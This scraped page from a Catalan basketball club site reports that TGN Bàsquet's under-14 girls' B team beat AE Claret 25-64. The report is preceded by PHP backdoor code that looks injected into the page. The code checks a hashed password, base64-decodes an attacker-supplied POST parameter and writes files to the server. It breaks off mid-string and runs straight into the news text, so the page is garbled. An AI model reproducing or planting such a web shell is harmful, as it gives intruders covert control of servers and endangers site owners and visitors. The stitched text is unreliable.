function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil femení B fa un parcial de 5-23 i guanya clarament l'AE Claret (25-64) - Tgn Bàsquet Club -

L’infantil femení B fa un parcial de 5-23 i guanya clarament l’AE Claret (25-64)

Updated: febrer 14, 2017

L’infantil femení B del TGN Bàsquet va derrotar clarament l’AE Claret en un partit que es va decantar del bàndol lila a partir del segon període. Després d’un inici igualat, un parcial 2-11 del minut 10 al 20 va començar a apropar el triomf a les lila. Aquesta dinàmica va continuar igual després del descans i un parcial de 5-23 va sentenciar completament el matx.